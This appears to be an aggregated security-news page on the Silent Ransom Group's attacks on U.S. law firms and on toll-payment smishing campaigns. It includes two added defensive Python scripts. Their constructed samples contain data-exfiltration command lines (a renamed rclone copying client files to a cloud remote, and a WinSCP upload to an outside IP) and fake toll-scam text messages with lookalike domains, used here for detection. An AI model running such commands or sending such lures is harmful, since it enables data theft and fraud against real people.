Pierluigi Paganini@Security Affairs
//
The FBI has issued a warning to U.S. law firms regarding an escalating cyber threat posed by the Silent Ransom Group (SRG), also known as Luna Moth or Chatty Spider. This group, active since 2022, has refined its tactics to target law firms specifically since early 2023, likely due to the valuable and confidential client data they possess. The group aims to gain unauthorized access to systems and devices in order to steal sensitive information and extort victims with threats of public data leaks.
SRG's methods include IT-themed social engineering calls and callback phishing emails. In these attacks, they impersonate IT personnel to deceive employees into granting remote access to systems. They may direct the employee to a malicious website or send a link via email that installs remote access software. Once inside, the attackers discreetly extract sensitive files using tools like WinSCP or disguised versions of Rclone. This campaign is particularly dangerous because it leaves minimal digital traces and can bypass traditional security measures.
To defend against these attacks, the FBI urges law firms to enhance staff training to recognize and avoid social engineering tactics. Implementing multi-factor authentication is crucial, as is proactive monitoring for unauthorized access attempts. The agency also advises that victims share any ransom evidence with law enforcement to aid in investigations. Furthermore, CISOs are encouraged to fortify help desk and employee defenses, enhance intrusion detection and tracking capabilities, and recognize that paying ransoms is not a viable strategy.
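The data-theft stage described above (renamed Rclone binaries and WinSCP or Rclone transfers to attacker-controlled destinations) leaves little on the wire but does leave process-creation telemetry. The following is an added example, not code from the FBI notification or from Security Affairs, of the kind of check a SOC might run over endpoint process events. The event fields are modelled on Sysmon-style process-creation records, the sample events and the sanctioned-destination allowlist are constructed, and the detection thresholds are illustrative.

```python
"""Flag process events that fit the exfiltration pattern: a binary whose PE
OriginalFileName says it is rclone/WinSCP but which runs under another name,
or a transfer whose destination is not on the organisation's allowlist.
Added example with constructed data; not from the original report."""
import re
from pathlib import PureWindowsPath

# Tools the notification names for data theft (matched on the PE OriginalFileName,
# which survives a simple rename; a fully rebuilt binary would need hash checks too).
EXFIL_TOOLS = {"rclone.exe", "winscp.exe"}

# Constructed allowlist: rclone remote names and SFTP hosts the (hypothetical) firm
# has sanctioned for backups. Everything else is treated as unsanctioned.
SANCTIONED_DESTINATIONS = {"corp-remote", "sftp.example-firm.internal"}

# rclone addresses remotes as "name:path"; skip Windows drive letters ("C:\") and
# URL schemes ("sftp://") so only remote names are captured.
RCLONE_REMOTE = re.compile(r"(?<![\w:/\\])([A-Za-z0-9_-]+):(?![\\/])")
# Host part of any scheme://[user@]host URL on the command line (WinSCP sessions).
URL_HOST = re.compile(r"[a-z]+://(?:[^@\s\"]+@)?([A-Za-z0-9.-]+)")

# Constructed sample events (not real telemetry). Fields mirror Sysmon event 1.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\rclone\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"rclone.exe sync C:\backup corp-remote:backup"},
    {"Image": r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"svchost.exe copy C:\Users\jdoe\Documents\Clients mega:dump --transfers 8"},
    {"Image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe", "OriginalFileName": "winscp.exe",
     "CommandLine": r'WinSCP.exe /command "open sftp://user@198.51.100.7/" "put C:\Clients\*"'},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"notepad.exe C:\Users\jdoe\notes.txt"},
]


def destinations(command_line: str) -> set:
    """Return transfer destinations found on a command line: URL hosts and rclone remotes."""
    found = {m.group(1) for m in URL_HOST.finditer(command_line)}
    found |= {m.group(1) for m in RCLONE_REMOTE.finditer(command_line)}
    return found


def analyze(events) -> list:
    """Apply both rules to each event and return a list of finding dicts."""
    findings = []
    for ev in events:
        original = ev.get("OriginalFileName", "").lower()
        if original not in EXFIL_TOOLS:
            continue  # only the named transfer tools are in scope here
        image_name = PureWindowsPath(ev["Image"]).name.lower()
        if image_name != original:
            # The binary claims to be rclone/WinSCP but runs under a different file name.
            findings.append({"rule": "renamed_tool", "image": ev["Image"],
                             "detail": f"OriginalFileName={original}"})
        unsanctioned = destinations(ev["CommandLine"]) - SANCTIONED_DESTINATIONS
        if unsanctioned:
            findings.append({"rule": "unsanctioned_destination", "image": ev["Image"],
                             "detail": ",".join(sorted(unsanctioned))})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['rule']:26} {f['image']}  [{f['detail']}]")
```

Run against the constructed events, the legitimate rclone backup to the sanctioned remote produces nothing, the renamed copy in a Temp folder trips both rules, and the WinSCP session to an unlisted host trips the destination rule; in production the allowlist would come from the firm's own backup configuration rather than a literal in the script.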
References:
- DataBreaches.Net: DataBreaches.net issues a Private Industry Notification about the Silent Ransom Group targeting law firms.
- securityaffairs.com: SecurityAffairs reports on Silent Ransom Group targeting law firms, the FBI warns.
- The DefendOps Diaries: The DefendOps Diaries explores the Silent Ransom Group's new era of cyber extortion.
- bsky.app: The FBI warned that an extortion gang known as the Silent Ransom Group has been targeting U.S. law firms over the last two years in callback phishing and social engineering attacks.
- BleepingComputer: FBI warns of Luna Moth extortion attacks targeting law firms
- ciso2ciso.com: Silent Ransom Group targeting law firms, the FBI warns – Source: securityaffairs.com
- hackread.com: FBI Warns of Silent Ransom Group Targeting Law Firms via Scam Calls
- databreaches.net: Private Industry Notification: Silent Ransom Group Targeting Law Firms
- Security Affairs: The FBI warns that the Silent Ransom Group, active since 2022 and also known as Luna Moth, has targeted U.S. law firms using phishing and social engineering. Linked to BazarCall campaigns, the group previously […]
- ciso2ciso.com: FBI Warns of Silent Ransom Group Targeting Law Firms via Scam Calls – Source:hackread.com
- malware.news: Private Industry Notification: Silent Ransom Group Targeting Law Firms
- ciso2ciso.com: FBI warns law firms: Silent Ransom Group uses phishing emails and fake IT calls to steal data, demanding ransom to prevent public leaks.
- gbhackers.com: FBI Issues on Silent Ransom Group Using Fake IT Support Calls to Target Victims
- malware.news: FBI Issues on Silent Ransom Group Using Fake IT Support Calls to Target Victims
- The Hacker News: The campaign leverages "information technology (IT) themed social engineering calls, and callback phishing emails, to gain remote access to systems or devices and steal sensitive data to extort the victims
- gbhackers.com: The Federal Bureau of Investigation (FBI) has issued a critical alert regarding the escalating activities of the cyber threat actor known as Silent Ransom Group (SRG), also identified under aliases such as Luna Moth, Chatty Spider, and UNC3753.
- Tech Monitor: The FBI alerts law firms to rising threat of Silent Ransom Group’s extortion tactics
- thecyberexpress.com: FBI Warns about Silent Ransom Group Targeting Law Firms
- eSecurity Planet: The FBI warns law firms of a stealth phishing scam where hackers call victims, pose as IT staff, and use remote access tools to steal sensitive data.
- www.scworld.com: US law firms facing Luna Moth ransomware threat
- cyble.com: FBI Warns Silent Ransom Group Targeting U.S. Law Firms Using Social Engineering and Callback Phishing
- www.esecurityplanet.com: FBI Warns Law Firms: Hackers Are Calling Offices in Stealth Phishing Scam
- www.techradar.com: FBI warns legal firms of Luna Moth extortion attacks where hackers will call their office
Stu Sjouwerman@blog.knowbe4.com
//
Tolling agencies throughout the United States are currently grappling with an escalating cybersecurity threat: deceptive text message scams known as smishing. These scams involve cybercriminals sending text messages that impersonate toll payment notifications, tricking individuals into clicking malicious links and making unauthorized payments. These messages often embed links that, if clicked, take the victim to a phishing site impersonating E-ZPass, The Toll Roads, FasTrak, Florida Turnpike, or another toll authority.
These scams are part of a sophisticated campaign leveraging platforms, most recently a PhaaS platform called Lucid. This platform enables cybercriminals to launch large-scale phishing campaigns with minimal effort. Cybercriminals behind this scheme are exploiting legitimate communication technologies like Apple iMessage and Android RCS to bypass traditional spam filters and deliver their malicious messages at scale.
The phishing messages typically claim unpaid toll fees and threaten fines or license suspension if recipients fail to respond. The Lucid platform offers advanced features such as dynamic targeting, device-specific focus, and evasion techniques. These features allow attackers to tailor campaigns for iOS or Android users, block connections from non-targeted regions, and prevent direct access to phishing domains.
References:
- aboutdfir.com: Have you ever received an odd text message on your phone, purporting to be from a toll provider or package delivery service? If you have a U.S. cell phone, chances are you’ve encountered one of these SMiShing attempts—cybercriminals’ latest ploy to trick you into giving up your personal
- www.cysecurity.news: Tolling agencies throughout the United States are battling an escalating cybersecurity threat that is causing deceptive text message scams, which are often called smishing, to escalate.
- Cyber Security News: Beware! Phishing Scam Uses Fake Unpaid Tolls Messages to Harvest Login Credentials
- gbhackers.com: Beware! Fake Unpaid Tolls Messages Used in Phishing Attack to Steal Login Credentials
- www.bleepingcomputer.com: E-ZPass toll payment texts return in massive phishing wave
- BleepingComputer: An ongoing phishing campaign impersonating E-ZPass and other toll agencies has surged recently, with recipients receiving multiple iMessage and SMS texts to steal personal and credit card information.
- The DefendOps Diaries: The Toll Payment Text Scam: A Modern Cybersecurity Threat
- blog.knowbe4.com: Upgraded Phishing-as-a-Service Platform Drives a Wave of Smishing Attacks
- cybersecuritynews.com: A sophisticated cybercriminal operation has emerged targeting toll payment services across multiple regions, with evidence suggesting this campaign will continue expanding globally.
- Cyber Security News: Toll Payment Services Abused in Large-Scale Hacking Campaign
- gbhackers.com: Threat Actors Exploit Toll Payment Services in Widespread Hacking Campaign
- securityonline.info: Resecurity report details escalation of smishing by China-based Smishing Triad targeting toll payments in US and UK.
- securityonline.info: Smishing Triad Expands Fraud Campaign, Targets Toll Payment Services
- www.scworld.com: Toll payment service-targeted schemes by Smishing Triad escalates
- Cisco Talos Blog: Cisco Talos has observed a widespread and ongoing financial theft SMS phishing (smishing) campaign since October 2024 that targets toll road users in the United States of America.
- krebsonsecurity.com: China-based SMS phishing kits are enjoying remarkable success converting phished payment card data into mobile wallets from Apple and Google. Until recently, the so-called “Smishing Triad” mainly impersonated toll road operators and shipping companies.
- www.silentpush.com: Smishing Triad is a Chinese eCrime group systematically targeting organizations in at least 121 countries with SMS phishing “smishing” campaigns.
- bsky.app: SilentPush has published a profile of Chinese cybercrime group Smishing Triad. The group is massive, with operations across 121 countries. The report also looks at the group's new phishing kit, named Lighthouse.
- gbhackers.com: Chinese eCrime Group Targets Users in 120+ Countries to Steal Banking Credentials
- www.silentpush.com: Smishing Triad: Chinese eCrime Group Targets 121+ Countries, Intros New Banking Phishing Kit
- blog.talosintelligence.com: Have you received a suspicious text that seemed to be from a toll road service? Discover how this widespread smishing scam is targeting U.S. drivers and uncover the actors behind it in our latest blog post:
- Cisco Talos: Have you received a suspicious text that seemed to be from a toll road service? Discover how this widespread smishing scam is targeting U.S. drivers and uncover the actors behind it in our latest blog post:
- cyberpress.org: “$5 SMS Scam Alert: Toll Road Users Targeted in New Phishing Campaign”
- Daily CyberSecurity: Nationwide Smishing Scam Targets Toll Road Users, Stealing Payment Data
- Cyber Security News: Cisco Talos has uncovered an ongoing financial theft campaign targeting toll road users across the United States through SMS phishing, or “smishing,” attacks. This campaign, active since October 2024, impersonates toll payment services to steal sensitive user information.
- gbhackers.com: Cybersecurity researchers at Cisco Talos have uncovered a large-scale smishing campaign targeting toll road users across the United States.
Stu Sjouwerman@blog.knowbe4.com
//
Cisco Talos has uncovered an extensive and ongoing SMS phishing campaign that began in October 2024, targeting toll road users across the United States. The "Smishing Triad," a China-based eCrime group, is suspected to be behind these attacks, impersonating E-ZPass and other U.S. toll agencies to steal financial information. Victims receive fraudulent text messages claiming they have an outstanding toll bill, typically under $5, and are urged to pay immediately to avoid late fees. These messages prompt users to click on a link that leads to a spoofed domain mimicking the legitimate toll service's website.
Once on the fake webpage, victims are asked to solve a CAPTCHA before being directed to a fraudulent bill displaying their name and the supposed amount owed. Upon clicking "Proceed Now," users are prompted to enter personal information, including their name, address, phone number, and credit card details, which are then stolen by the threat actors. Talos assesses with moderate confidence that multiple financially motivated threat actors are involved, utilizing a smishing kit developed by "Wang Duo Yu." The actors have targeted individuals in at least eight states, including Washington, Florida, Pennsylvania, Virginia, Texas, Ohio, Illinois, and Kansas, identified through spoofed domains containing the states' two-letter abbreviations.
The Smishing Triad, known for systematically targeting organizations in at least 121 countries across various industries, has shown remarkable success in converting phished payment card data into mobile wallets from Apple and Google. Silent Push analysts have found that the group's infrastructure generated over one million page visits in just 20 days, suggesting a potentially higher volume of SMS messages sent than previously estimated. The group continues to sell its phishing kits via Telegram and other channels. Authorities, including the FBI's IC3, have been aware of similar scams since at least April 2024, highlighting the persistent and evolving nature of these phishing campaigns.
References:
- Cisco Talos Blog: Cisco Talos has observed a widespread and ongoing financial theft SMS phishing (smishing) campaign since October 2024 that targets toll road users in the United States of America.
- Blog: A recent smishing campaign is impersonating E-ZPass and other U.S.-based toll agencies and sending fraudulent text messages to individuals. These messages claim that recipients have unpaid tolls and urge immediate payment to avoid penalties or suspension of driving privileges.
- Cisco Talos: Have you received a suspicious text that seemed to be from a toll road service? Discover how this widespread smishing scam is targeting U.S. drivers and uncover the actors behind it in our latest blog post:
- krebsonsecurity.com: China-based SMS phishing Triad Pivots to Banks
- www.silentpush.com: Smishing Triad is a Chinese eCrime group systematically targeting organizations in at least 121 countries with SMS phishing “smishing” campaigns.
Stu Sjouwerman@blog.knowbe4.com
//
A China-based cybercriminal group known as the Smishing Triad is behind a surge in smishing campaigns targeting consumers in the US and UK. The group is exploiting toll payment services by sending fraudulent text messages that appear to originate from legitimate toll collection agencies such as FasTrak, E-ZPass, and I-Pass. These deceptive messages claim unpaid toll bills or payment requests, tricking users into divulging sensitive personal and financial information. Tolling agencies throughout the United States are battling this escalating cybersecurity threat, highlighting the need for heightened vigilance.
These campaigns utilize tactics that make it difficult for consumers to protect themselves, primarily by spoofing Sender IDs (SIDs) via SMS, iMessage, and other instant messaging (IM) platforms. The attackers impersonate legitimate organizations, creating a sense of urgency to prompt immediate action from the recipients. The lower spam protection of SMS compared to email makes these IM channels a fertile ground for exploitation, leading to a higher likelihood of victims falling for the scam. The attackers’ objectives include financial gain and the theft of personal and financial data for future exploitation.
The scale of the campaign is significant, with the use of over 60,000 impersonation websites, complicating efforts by platforms like Apple and Android to block these fraudulent activities effectively. These fraudulent websites mimic official toll payment portals, tricking users into entering payment details or personal information, which is then harvested for financial fraud and identity theft. Federal and state agencies have issued warnings, advising individuals to verify toll-related claims through official websites and avoid clicking on links in unsolicited text messages. Consumers are also advised to report suspicious messages to authorities and enable security features on smartphones.
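The three toll-scam items above (the Lucid platform campaign, the Talos analysis of sub-$5 lures on spoofed domains carrying state abbreviations, and the Smishing Triad's impersonation sites) describe the same message pattern from the recipient's side. The following is an added example, not code from KnowBe4, Cisco Talos, Silent Push or any other source on this page, of a triage routine that scores an inbound text against that pattern: toll-themed urgency wording, a small dollar amount, a link whose host is not an official agency host, and brand words or a state abbreviation baked into that host. The official-host allowlist, the sample messages and the scoring weights are all constructed assumptions, not real agency domains or a vendor's heuristics.

```python
"""Score inbound text messages against the toll-themed smishing pattern.
Added example with constructed data; not from any report cited on the page."""
import re
from urllib.parse import urlsplit

# Placeholder allowlist standing in for the genuine hostnames of the toll agencies
# an organisation's users deal with (assumption; populate from official sources).
OFFICIAL_HOSTS = {"tolls.example-agency.gov", "pay.example-turnpike.org"}

# Brands the reports list as impersonated (E-ZPass, FasTrak, I-Pass, The Toll Roads,
# Florida Turnpike), written as they look once hyphens and dots are removed.
BRAND_TOKENS = ("ezpass", "fastrak", "ipass", "tollroads", "turnpike", "toll")

# US state abbreviations; Talos tied spoofed domains to the targeted state.
US_STATES = {
    "al", "ak", "az", "ar", "ca", "co", "ct", "de", "fl", "ga", "hi", "id", "il", "in",
    "ia", "ks", "ky", "la", "me", "md", "ma", "mi", "mn", "ms", "mo", "mt", "ne", "nv",
    "nh", "nj", "nm", "ny", "nc", "nd", "oh", "ok", "or", "pa", "ri", "sc", "sd", "tn",
    "tx", "ut", "vt", "va", "wa", "wv", "wi", "wy",
}

LURE = re.compile(
    r"(unpaid|outstanding)\s+toll|late\s+fee|licen[cs]e\s+suspen|toll\s+(bill|balance|fee)",
    re.I)
AMOUNT = re.compile(r"\$\s?(\d+(?:\.\d{2})?)")
# Links in smishing texts often omit the scheme, so it is optional here.
URL = re.compile(r"(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?:/\S*)?", re.I)

# Constructed sample messages (not real captures).
SAMPLE_MESSAGES = [
    "E-ZPass: You have an unpaid toll balance of $4.15. To avoid a late fee and "
    "license suspension, pay now at https://ezpass-wa-pay.com/bill",
    "Reminder: your dental appointment is tomorrow at 9am. Reply C to confirm.",
    "Toll statement available. View it at https://tolls.example-agency.gov/account.",
    "FasTrak Notice: outstanding toll of $3.50. Pay at thetollroads-ca.com/pay to prevent a fine.",
]


def host_of(url: str) -> str:
    """Normalise a link to its hostname, adding a scheme if the text omitted it."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def triage(message: str) -> dict:
    """Return a verdict, a score and the reasons behind it for one message."""
    reasons, score = [], 0
    if LURE.search(message):
        reasons.append("toll_lure_wording"); score += 1
    amount = AMOUNT.search(message)
    if amount and float(amount.group(1)) < 5.0:
        # Talos observed amounts typically under $5; small sums lower the victim's guard.
        reasons.append("small_amount_under_5_usd"); score += 1
    hosts = [host_of(m.group(0)) for m in URL.finditer(message)]
    for host in hosts:
        if host in OFFICIAL_HOSTS:
            continue  # genuine agency link: no impersonation checks needed
        reasons.append(f"non_official_host:{host}"); score += 1
        flat = host.replace("-", "").replace(".", "")
        if any(brand in flat for brand in BRAND_TOKENS):
            reasons.append(f"brand_in_host:{host}"); score += 1
        tokens = set(re.split(r"[.-]", host))
        for state in sorted(tokens & US_STATES):
            reasons.append(f"state_token:{state}"); score += 1
    verdict = "likely_smishing" if score >= 3 else "suspicious" if score else "benign"
    return {"verdict": verdict, "score": score, "reasons": reasons, "hosts": hosts}


if __name__ == "__main__":
    for text in SAMPLE_MESSAGES:
        result = triage(text)
        print(f"{result['verdict']:16} score={result['score']}  {text[:60]}")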
References:
- www.cysecurity.news: Tolling agencies throughout the United States are battling an escalating cybersecurity threat that is causing deceptive text message scams, which are often called smishing, to escalate.
- BleepingComputer: Toll payment text scam returns in massive phishing wave
- gbhackers.com: Beware! Fake Unpaid Tolls Messages Used in Phishing Attack to Steal Login Credentials
- www.bleepingcomputer.com: The E-ZPass toll payment texts return in massive phishing wave
- Cyber Security News: Beware! Phishing Scam Uses Fake Unpaid Tolls Messages to Harvest Login Credentials
- The DefendOps Diaries: The Toll Payment Text Scam: A Modern Cybersecurity Threat
- www.bleepingcomputer.com: An ongoing phishing campaign impersonating E-ZPass and other toll agencies has surged recently, with recipients receiving multiple iMessage and SMS texts to steal personal and credit card information.
- gbhackers.com: Threat Actors Exploit Toll Payment Services in Widespread Hacking Campaign
- securityonline.info: Smishing campaigns exploiting toll payment systems to deceive consumers into disclosing sensitive information, often linked to popular platforms like FasTrak, E-ZPass, and I-Pass.
- Cyber Security News: In a sophisticated cybercrime operation, the Smishing Triad, a China-based group, has been identified as the orchestrator behind a surge in smishing campaigns targeting consumers in the US and UK.
- blog.knowbe4.com: Upgraded Phishing-as-a-Service Platform Drives a Wave of Smishing Attacks
- cybersecuritynews.com: Threat Actors Leveraging Toll Payment Services in Massive Hacking Attack
- securityonline.info: Smishing Triad Expands Fraud Campaign, Targets Toll Payment Services
- www.scworld.com: Toll payment service-targeted schemes by Smishing Triad escalates
- blog.talosintelligence.com: Unraveling the U.S. toll road smishing scams
- DataBreaches.Net: E-ZPass toll payment texts return in massive phishing wave
- Blog: Unpaid toll-themed smishing campaign gives victims no free ‘E-ZPass’
- Cisco Talos: Have you received a suspicious text that seemed to be from a toll road service? Discover how this widespread smishing scam is targeting U.S. drivers and uncover the actors behind it in our latest blog post:
- Cisco Talos Blog: Cisco Talos has observed a widespread and ongoing financial theft SMS phishing (smishing) campaign since October 2024 that targets toll road users in the United States of America.
- krebsonsecurity.com: China-based purveyors of SMS phishing kits are enjoying remarkable success converting phished payment card data into mobile wallets from Apple and Google. Until recently, the so-called “Smishing Triad” mainly impersonated toll road operators and shipping companies.
- www.silentpush.com: Smishing Triad: Chinese eCrime Group Targets 121+ Countries, Intros New Banking Phishing Kit
- bsky.app: SilentPush has published a profile of Chinese cybercrime group Smishing Triad. The group is massive, with operations across 121 countries. The report also looks at the group's new phishing kit, named Lighthouse.
- gbhackers.com: Smishing Triad has targeted numerous countries, including but not limited to UK, Canada, and USA.
- www.silentpush.com: Smishing Triad is a Chinese eCrime group systematically targeting organizations in at least 121 countries with SMS phishing “smishing” campaigns.